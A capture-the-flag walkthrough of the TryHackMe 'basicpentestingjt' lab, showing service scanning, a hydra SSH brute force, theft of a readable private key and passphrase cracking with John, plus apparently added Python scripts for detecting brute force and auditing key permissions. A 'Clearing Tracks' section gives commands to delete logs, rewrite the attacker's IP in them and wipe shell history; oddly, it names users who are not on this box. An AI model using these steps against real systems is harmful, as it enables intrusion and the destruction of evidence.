THM:basicpentestingjt

    URL: https://tryhackme.com/room/basicpentestingjt [Easy]

    Tags:

    ctf nmap enum4linux gobuster dirbuster hydra private-key john ssh2john apache ubuntu privesc sudo

    Reconnaissance

    Description of the room:

    In this set of tasks you’ll learn the following:

    • brute forcing
    • hash cracking
    • service enumeration
    • Linux Enumeration

    The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

    Credits to Josiah Pierce from Vulnhub.

    Scanning

    Running: nmap

    Ran the following:

    nmap -sC -sV xxx.xxx.xxx.xxx

    Which produced the following output:

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 23:17 EST
    Nmap scan report for 10.10.183.192
    Host is up (0.28s latency).
    Not shown: 994 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    8009/tcp open  ajp13
    8080/tcp open  http-proxy
    
    Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds
    

    Also see: nmap.log

    Enumerating Samba Users

    Since Samba is running, we can run:

    /usr/share/enum4linux/enum4linux.pl -a xxx.xxx.xxx.xxx

    This resulted in the following log (truncated for space; only the key portion is kept):

     ======================================================================= 
    |    Users on 10.10.145.91 via RID cycling (RIDS: 500-550,1000-1050)    |
     ======================================================================= 
    S-1-22-1-1000 Unix User\kay (Local User)
    S-1-22-1-1001 Unix User\jan (Local User)
    

    From this, we know we have at least two users: jan and kay.

    Finding Web Server Folders

    To attempt to find subfolders on the web server, GoBuster was used via:

    gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://xxx.xxx.xxx.xxx/

    This is what allowed us to find the /development folder:

    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.183.192/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Timeout:                 10s
    ===============================================================
    2022/01/17 23:22:47 Starting gobuster in directory enumeration mode
    ===============================================================
    
    /development          (Status: 301) [Size: 320] [--> http://10.10.183.192/development/]
    

    Also see: gobuster.log

    Attempting to guess jan’s SSH password

    Using hydra, we try RockYou passwords over SSH with:

    hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://xxx.xxx.xxx.xxx

    Which resulted in:

    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-17 23:30:43
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking ssh://10.10.183.192:22/
    [STATUS] 170.00 tries/min, 170 tries in 00:01h, 14344231 to do in 1406:18h, 16 active
    [STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
    [STATUS] 109.29 tries/min, 765 tries in 00:07h, 14343636 to do in 2187:29h, 16 active
    [22][ssh] host: 10.10.183.192   login: jan   password: armando
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 2 final worker threads did not complete until end.
    [ERROR] 2 targets did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-17 23:37:48
    

    This is where we discovered the password armando for user jan.

    Also see: hydra.log
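From the defender’s side, the hydra run above leaves a dense trail of "Failed password for jan" lines in the target’s auth.log, followed by one "Accepted password". The script below is an added example (not part of the original writeup, and not hydra’s or OpenSSH’s code) that counts failures per source/account in a sliding window and flags the later successful login; the auth.log lines are constructed samples, and the year is assumed because syslog stamps carry none.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not captured from the room's machine). It
# mirrors what OpenSSH logs while hydra drives parallel tasks at one account.
SAMPLE_AUTH_LOG = """\
Jan 17 23:30:44 target sshd[1201]: Failed password for jan from 10.10.2.14 port 40210 ssh2
Jan 17 23:30:44 target sshd[1202]: Failed password for jan from 10.10.2.14 port 40212 ssh2
Jan 17 23:30:45 target sshd[1203]: Failed password for jan from 10.10.2.14 port 40214 ssh2
Jan 17 23:30:45 target sshd[1204]: Failed password for jan from 10.10.2.14 port 40216 ssh2
Jan 17 23:30:46 target sshd[1205]: Failed password for jan from 10.10.2.14 port 40218 ssh2
Jan 17 23:30:46 target sshd[1206]: Failed password for jan from 10.10.2.14 port 40220 ssh2
Jan 17 23:37:47 target sshd[1290]: Accepted password for jan from 10.10.2.14 port 41111 ssh2
Jan 17 23:38:10 target sshd[1301]: Failed password for kay from 192.168.1.5 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_ts(stamp, year=2022):
    # syslog timestamps carry no year; one is assumed so lines can be ordered
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def find_brute_force(log_text, threshold=5, window_s=60):
    """Return findings as (src, user, failure_count, kind) tuples: 'brute-force'
    once a (src, user) pair reaches `threshold` failures inside `window_s` seconds,
    'success-after-failures' when that pair later logs in (the alert to page on)."""
    recent = defaultdict(list)   # (src, user) -> failure times still in window
    total = Counter()            # (src, user) -> all failures seen so far
    alerted, findings = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not an auth result line
        key, ts = (m["src"], m["user"]), parse_ts(m["ts"])
        if m["result"] == "Failed":
            total[key] += 1
            recent[key] = [t for t in recent[key] if (ts - t).total_seconds() <= window_s] + [ts]
            if len(recent[key]) >= threshold and key not in alerted:
                alerted.add(key)
                findings.append((*key, len(recent[key]), "brute-force"))
        elif total[key]:
            findings.append((*key, total[key], "success-after-failures"))
    return findings
```

Lowering the parallelism (hydra’s own "-t 4" warning above) only slows the pattern down; the per-source failure count still accumulates, which is why the success-after-failures rule keys on the total rather than the window.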

    Gaining Access

    Privilege Escalation from jan to kay.

    While running LinPEAS, we found that user jan had permission to read user kay’s SSH private key. So, the key was retrieved via:

    cat /home/kay/.ssh/id_rsa

    When attempting to log into the server as Kay via:

    ssh kay@xxx.xxx.xxx.xxx -i ./kay_id_rsa

    We are confronted with a password prompt. The SSH key is password protected.
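The foothold on this box came from a private key that another local user could read, and only its passphrase stood between jan and kay’s account. The script below is an added example (not from the room, the writeup, or LinPEAS) that audits home directories for private keys readable by group/other and reads the PEM headers to tell whether a legacy OpenSSL-format key is passphrase-protected and with which cipher; build_demo_homes creates a constructed fixture with placeholder text in place of key material, and the 0644 mode for kay’s key is an assumption.

```python
import os
import stat
import tempfile

def key_is_passphrase_protected(pem_head):
    """Decide from PEM headers whether a private key is encrypted. Legacy OpenSSL
    PEM (the room's key) advertises 'Proc-Type: 4,ENCRYPTED' plus a DEK-Info cipher
    line; new-style OpenSSH keys hide the cipher in the blob, so they return None."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem_head:
        return None, "openssh-format"
    if "Proc-Type: 4,ENCRYPTED" not in pem_head:
        return False, "none"
    dek = [l for l in pem_head.splitlines() if l.startswith("DEK-Info:")]
    cipher = dek[0].split(":", 1)[1].strip().split(",")[0] if dek else "unknown"
    return True, cipher   # e.g. 'AES-128-CBC'

def audit_private_keys(home_root):
    """Walk <home_root>/*/.ssh and report private keys plus who else can read them."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        for name in (os.listdir(ssh_dir) if os.path.isdir(ssh_dir) else []):
            path = os.path.join(ssh_dir, name)
            with open(path, errors="replace") as f:
                head = f.read(400)
            if "PRIVATE KEY-----" not in head:
                continue          # public keys, known_hosts, config
            mode = stat.S_IMODE(os.stat(path).st_mode)
            encrypted, cipher = key_is_passphrase_protected(head)
            findings.append({"user": user, "path": path, "mode": oct(mode),
                             "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
                             "encrypted": encrypted, "cipher": cipher})
    return findings

def build_demo_homes():
    """Constructed fixture (placeholder text, no real key material); modes are assumed."""
    root = tempfile.mkdtemp()
    fixtures = {
        "kay": (0o644, "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                       "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                       "<placeholder>\n-----END RSA PRIVATE KEY-----\n"),
        "jan": (0o600, "-----BEGIN RSA PRIVATE KEY-----\n<placeholder>\n-----END RSA PRIVATE KEY-----\n"),
    }
    for user, (mode, body) in fixtures.items():
        path = os.path.join(root, user, ".ssh", "id_rsa")
        os.makedirs(os.path.dirname(path))
        with open(path, "w") as f:
            f.write(body)
        os.chmod(path, mode)   # chmod ignores umask, so the mode is exact
    return root
```

A key that is readable by others and reported as encrypted is exactly the situation in this room: the passphrase is the only remaining control, and a dictionary word will not hold.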

    Processing Kay’s Private SSH Key

    We can take that private key:

    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
    
    -----END RSA PRIVATE KEY-----
    

    We can convert that key into a format John the Ripper understands, so it can crack the passphrase. We can do that by running the ssh2john.py script from here:

    ssh2john.py ./kay_id_rsa > ./kay_id_rsa.hash

    Resulting in the following hash of the private key file, suitable for John the Ripper to crack the passphrase:

    ./kay_rsa_id:$sshng$1$16$6ABA7DE35C{...snip...}edb337116fa6e5ed858
    

    We then run John the Ripper against it, using a word list:

    john --wordlist=/usr/share/wordlists/rockyou.txt ./kay_id_rsa.hash

    We ultimately determine the password for the SSH key is: beeswax.

    Once logged in as user kay, we could read the pass.bak file which had the final flag of: heresareallystrongpasswordthatfollowsthepasswordpolicy$$.

    Maintaining Access

    This is a test machine. However, in a Red Team scenario, we could:

    Clearing Tracks

    This is a test machine. However, in a Red Team scenario, we could:

    Delete relevant logs from /var/log/ - although that might draw attention.

    rm -Rf /var/log/*

    Search and replace our IP address in all logs via:

    find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

    Wipe bash history for any accounts we used via:

    cat /dev/null > /root/.bash_history

    cat /dev/null > /home/kathy/.bash_history

    cat /dev/null > /home/sam/.bash_history

    Summary

    Below is a summary of key findings.

    Name                      Value
    Users                     jan, kay
    Password for jan          armando
    Password for kay SSH key  beeswax
    Final flag                heresareallystrongpasswordthatfollowsthepasswordpolicy$$

    Completed: 1/17/2022 @ 8:52p by r0bsec.